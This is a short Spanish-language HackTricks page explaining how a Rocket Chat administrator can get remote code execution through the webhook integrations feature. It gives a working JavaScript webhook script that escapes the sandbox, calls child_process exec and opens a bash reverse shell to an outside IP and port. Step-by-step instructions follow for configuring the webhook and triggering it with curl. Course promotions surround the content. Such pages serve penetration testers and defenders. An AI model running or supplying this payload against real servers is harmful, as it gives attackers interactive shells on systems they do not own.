Rocket Chat

Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

RCE

Si eres administrador dentro de Rocket Chat puedes obtener RCE.

  • Ve a Integrations y selecciona Nueva Integración y elige cualquiera: Incoming WebHook o Outgoing WebHook.

  • /admin/integrations/incoming

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
  • Configurar el WebHook (el canal y la publicación como nombre de usuario deben existir):

  • Configurar el script del WebHook:

  • Guardar cambios

  • Obtener la URL del WebHook generada:

  • Llámalo con curl y deberías recibir la reverse shell

Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Última actualización